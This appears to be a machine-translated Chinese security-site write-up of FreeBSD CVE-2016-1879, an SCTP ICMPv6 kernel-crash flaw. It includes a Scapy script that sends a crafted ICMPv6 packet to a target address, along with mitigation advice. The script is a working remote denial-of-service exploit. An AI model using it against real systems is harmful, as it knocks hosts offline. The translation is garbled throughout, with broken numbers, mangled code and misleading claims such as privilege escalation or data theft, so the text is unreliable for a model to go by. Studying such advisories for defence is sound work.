FreeBSD remote DoS attacks exploit analysis CVE-2 0 1 6-1 8 7 9-a vulnerability warning-the black bar safety net

2016-01-27T00:00:00
ID MYHACK58:62201671449
Type myhack58
Reporter 佚名
Modified 2016-01-27T00:00:00

Description

The FreeBSD team announced theiroperating systemthere is a serious vulnerability, hackers can exploit this vulnerability to DoS(denial of service attacks, to mention the right or to steal system sensitive information. SCTP ICMPv6 error handling Vulnerability (CVE-2 0 1 6-1 8 7 9) SCTP (stream control transmission Protocol)is a Transport Layer Protocol, it can be used in the IP environment in the transmission signal. Typically, the mobile operators will be in the technology used in the network of this Agreement. This vulnerability affects the FreeBSD system a number of versions 9.3, and 10.1 and 10.2 if they are to support SCTP and IPV6 will be caught, which is actually the system default configuration. Hackers exploit this vulnerability, you need to send a carefully the structure of the ICMPv6 message. If the exploit is successful, the system can be a DoS attack. The DoS attack is due to the system from the ICMPv6 error message, and did not carefully check SCTP header length. If the target recipient does not exist, the routing will generate an error information, via ICMPv6 feedback to the sender. The ICMPv6 includes the original IPv6 packet, wherein the Next Header area will display the SCTP is how to package: ! In the system kernel received via ICMPv6 is sent to the error message, it will be the upper layer Protocol packet is transmitted to the necessary parser sctp6_ctlinput (). SCTP parser the incoming head mistaken for a legitimate length, and then trying to use m_copydata()to its copy, which there are offset values and byte values. Originally the system was expected message length of the head is 1 to 2 bytes, but the hacker is probably to send it a length of 1 1-byte header, and finally a null pointer reference will cause the kernel to crash. Exploit code Take advantage of this vulnerability, we do not need to open an SCTP socket. The magic of Scapy will help us create the exploit required for the ICMPv6 data packet where the editor code layout indentation is as follows, there is a demand, add your own adjustments to:

!/ usr/bin/env python

-- coding: utf-8 --

import argparse from scapy. all import *

def get_args(): parser = argparse. ArgumentParser(description='#' * 7 8, epilog='#' * 7 8) parser. add_argument("-m", "--dst_mac", type=str, help="the FreeBSD mac address") parser. add_argument("-i", "--dst_ipv6", type=str, help="the FreeBSD IPv6 address") parser. add_argument("-I", "--iface", type=str, help="Iface") options = parser. parse_args()

if options. dst_mac is None or options. dst_ipv6 is None: parser. print_help() exit()

return options

if name == 'main': options = get_args()

sendp(Ether(dst=options. dst_mac) / IPv6(dst=options. dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=1 3 2, src=options. dst_ipv6, dst='fe80::2 3 0:56ff:fea6:648c'), iface=options. iface) Repair and security advice In order to protect your system is not affected by the vulnerabilities, we recommend that you do the following: If you do not need IPv6, disable it. The firewall is disabled ICMPv6 or IPv6 traffic. If not, please disable the system kernel SCTP stack supports the need to re-compile the kernel to. To fix the vulnerability, you can use the vendor's patch, installed the SCTP ICMPv6 message extra check, there is also the need to re-compile the kernel. Other vulnerability-related In addition, the FreeBSD system also broke the other serious vulnerabilities, the official developers as they released the patch. 1. The presence of such a vulnerability, if the system is enabled TCP_MD5SIG and TCP_NOOPT, the hacker through the TCP connection, the system can be a DoS attack. They just need a TCP_NOOPT enabled a listening socket, you can take advantage of this vulnerability, the CVE-2 0 1 6-1 8 8 2 patch in. 2. Linux under the Robust Futex errors will cause the system to memory data breaches(CVE-2 0 1 6-1 8 8 0 patch in. 3. Insecure default configuration, resulting in a hacker can access the daemon configuration file,/etc/bsnmpd. conf(CVE-2 0 1 5-5 6 7 7 patch to. In order to protect your system from vulnerabilities to abuse, is strongly recommended that you configure security after the re-use IPv6 addresses, and install the appropriate security tools to protect the security of the system.